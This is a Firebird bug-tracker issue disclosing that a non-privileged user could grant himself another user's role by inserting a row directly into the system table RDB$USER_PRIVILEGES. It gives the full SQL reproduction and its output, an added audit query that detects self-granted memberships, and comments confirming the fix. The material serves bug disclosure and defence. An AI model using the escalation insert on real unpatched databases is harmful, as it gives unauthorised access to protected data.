Non-privileged user can grant other's role to himself [CORE4341] #4663

Closed
firebird-automations opened this issue Feb 15, 2014 · 7 comments
Comments

@firebird-automations
Collaborator

Submitted by: @pavel-zotov

Votes: 1

SQL> create database 'sec.fdb';
SQL> drop user boss; -- if exists...
SQL> drop user zero; -- if exists...

SQL> create user boss password 'boss'; -- this user CAN access some data
SQL> create user zero password 'zero'; -- this is a non-privileged user

SQL> create role rboss;
SQL> create role rzero;

SQL> grant rboss to boss;
SQL> grant rzero to zero;

SQL> create table salary(id int, s int);
SQL> insert into salary values(1, 1000);
SQL> commit;
SQL> grant all on salary to rboss; -- we grant access only to this role; NOT to role 'RZERO'!
SQL> commit;
SQL> quit;

----------------

-- now check that user BOSS can view and edit table SALARY via role RBOSS:
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user boss -pas boss -role RBOSS
Database: /var/db/fb30/sec.fdb, User: boss, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER BOSS
ROLE RBOSS

SQL> select * from salary;

ID 1
S 1000

SQL> update salary set s=2000 where id=1;
SQL> insert into salary values(2,2222);
SQL> commit;
SQL> select * from salary;

ID 1
S 2000

ID 2
S 2222

-- that's OK.
SQL> exit;

-------------------------------------

-- now connect as non-privileged user 'ZERO' (specifying his role is optional; result is the same):

$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user zero -pas zero
Database: /var/db/fb30/sec.fdb, User: zero
SQL> show role;
RBOSS RZERO

SQL> show table;
SALARY

SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY -- OK, this is as it should be

-- and now we insert a new record into system table RDB$USER_PRIVILEGES (we CAN do this!)
-- NB: we can add the row either without specifying a value for the RDB$GRANTOR field or with it set to 'ZERO' (i.e. the current user):

SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED! Why ??

SQL> commit;

SQL> connect '/var/db/fb30/sec.fdb' user zero password 'zero' role 'RBOSS';
Database: '/var/db/fb30/sec.fdb', User: zero, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER ZERO -- I'm connected as a non-privileged user...
ROLE RBOSS -- ...but I HAVE been granted the role of BOSS (and I did it myself)

-- final check:
SQL> select * from salary;

ID 1
S 2000

ID 2
S 2222

SQL> show version;
ISQL Version: LI-T3.0.0.30876 Firebird 3.0 Alpha 2
Server version:
Firebird/Linux/AMD/Intel/x64 (access method), version "LI-T3.0.0.30876 Firebird 3.0 Alpha 2"
on disk structure version 12.0

====== Test Details ======

See test for CORE4731 ("Prohibit an ability to issue DML or DDL statements on RDB$ tables").
Currently (31-aug-2020) there are only 23 statements that can directly modify RDB$ tables and must be allowed; see them in core_4731.fbt.
Table RDB$USER_PRIVILEGES is not among them.
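The report above shows role membership being recorded as a row in RDB$USER_PRIVILEGES with privilege 'M', user type 8 and object type 13, and with RDB$GRANTOR either left empty or set to the grantee. The audit query below is an added example, not part of the ticket or of Firebird's own code: run from an administrative connection, it lists every role membership in a database and flags rows whose grantor is missing, is the grantee himself, or is neither the role's owner nor SYSDBA. It assumes the RDB$USER_PRIVILEGES and RDB$ROLES layout of Firebird 2.5/3.0 (in particular the RDB$ROLES.RDB$OWNER_NAME column); the role and user names are whatever the audited database contains.

```sql
-- Audit of role memberships stored in RDB$USER_PRIVILEGES (added example, not from the ticket).
-- A regular GRANT <role> TO <user> is written by the engine with RDB$GRANTOR set to the
-- user who issued it, normally the role owner or SYSDBA. Rows that do not fit that pattern
-- are worth a closer look on any database that passed through an affected build.
select
    p.rdb$user           as grantee,
    p.rdb$relation_name  as role_name,
    p.rdb$grantor        as grantor,
    r.rdb$owner_name     as role_owner,
    case
        when r.rdb$role_name is null
            then 'ROLE DOES NOT EXIST'           -- membership row without a matching role
        when p.rdb$grantor is null
            then 'NO GRANTOR RECORDED'           -- engine always records a grantor
        when trim(p.rdb$grantor) = trim(p.rdb$user)
            then 'SELF-GRANTED'                  -- grantee and grantor are the same user
        when trim(p.rdb$grantor) not in (trim(r.rdb$owner_name), 'SYSDBA')
            then 'GRANTOR IS NOT ROLE OWNER'     -- legitimate only via WITH ADMIN OPTION
        else 'OK'
    end                  as finding
from rdb$user_privileges p
left join rdb$roles r
    on r.rdb$role_name = p.rdb$relation_name
where p.rdb$privilege   = 'M'    -- 'M' = membership in a role
  and p.rdb$user_type   = 8     -- 8  = grantee is a user
  and p.rdb$object_type = 13    -- 13 = granted object is a role
order by finding, role_name, grantee;
```

'GRANTOR IS NOT ROLE OWNER' is a review item rather than a verdict: a user who received the role WITH ADMIN OPTION may legitimately grant it to others, so compare such rows against the intended administration model before acting on them. On a server with the fix, the direct insert shown in the ticket is rejected (see the later comments), so this query is mainly useful for databases that were created or administered on an affected build.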

@firebird-automations
Collaborator Author

Modified by: @dyemanov

Version: 3.0 Alpha 1 [ 10331 ]

Version: 2.5.2 Update 1 [ 10521 ]

Version: 2.1.5 Update 1 [ 10522 ]

Version: 2.5.2 [ 10450 ]

Version: 2.1.5 [ 10420 ]

Version: 2.5.1 [ 10333 ]

Version: 2.1.4 [ 10361 ]

Version: 2.5.0 [ 10221 ]

Version: 2.1.3 [ 10302 ]

Version: 2.1.2 [ 10270 ]

Version: 2.1.1 [ 10223 ]

Version: 2.1.0 [ 10041 ]

Component: Engine [ 10000 ]

summary: non-privileged user can grant other's role to himself => Non-privileged user can grant other's role to himself

@firebird-automations
Collaborator Author

Commented by: @pavel-zotov

PS. The result is the same for both embedded and remote (via TCP) connections.

[root@oel64 23:16:20 fb30]$ /opt/fb30trnk/bin/isql localhost/3333:/var/db/fb30/sec.fdb -user zero -pas zero -role RZERO
Database: localhost/3333:/var/db/fb30/sec.fdb, User: zero, Role: RZERO
SQL> set list on; select current_user,current_role from rdb$database;

USER ZERO
ROLE RZERO

SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED!
SQL> commit;

SQL> select mon$remote_protocol,mon$remote_version,mon$client_version,mon$auth_method from mon$attachments where mon$attachment_id=current_connection;

MON$REMOTE_PROTOCOL TCPv4
MON$REMOTE_VERSION P13
MON$CLIENT_VERSION LI-T3.0.0.30876 Firebird 3.0 Alpha 2
MON$AUTH_METHOD Legacy_Auth

SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY -- this is because the current role is RZERO rather than RBOSS
SQL> quit;

-- But:
$ /opt/fb30trnk/bin/isql localhost/3333:/var/db/fb30/sec.fdb -user zero -pas zero -role RBOSS
Database: localhost/3333:/var/db/fb30/sec.fdb, User: zero, Role: RBOSS
SQL> set list on; select current_user,current_role from rdb$database;

USER ZERO
ROLE RBOSS -- <<<< NB <<<<<

SQL> select * from salary;

ID 1
S 1000

ID 2
S 2222

@firebird-automations
Collaborator Author

Modified by: @dyemanov

assignee: Alexander Peshkov [ alexpeshkoff ]

@firebird-automations
Collaborator Author

Commented by: @AlexPeshkoff

Currently for both B3_0 & master I get:

# ./isql -user zero employee
Database: employee, User: ZERO
SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type) values( 'ZERO', 'M', 'RBOSS', 8, 13 );
Statement failed, SQLSTATE = 28000
no permission for UPDATE access to TABLE RDB$RELATION_FIELDS
SQL>

Is it OK to close ticket?

@firebird-automations
Collaborator Author

Commented by: @pavel-zotov

I've checked on WI-V3.0.7.33358; WI-V4.0.0.2185 -- all OK.
Ticket is to be closed.

@firebird-automations
Collaborator Author

Modified by: @pavel-zotov

status: Open [ 1 ] => Closed [ 6 ]

resolution: Fixed [ 1 ]

@firebird-automations
Collaborator Author

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: Covered by another test(s)

Test Details: See test for CORE4731 ("Prohibit an ability to issue DML or DDL statements on RDB$ tables").
Currently (31-aug-2020) there are only 23 statements that can directly modify RDB$ tables and must be allowed; see them in core_4731.fbt.
Table RDB$USER_PRIVILEGES is not among them.
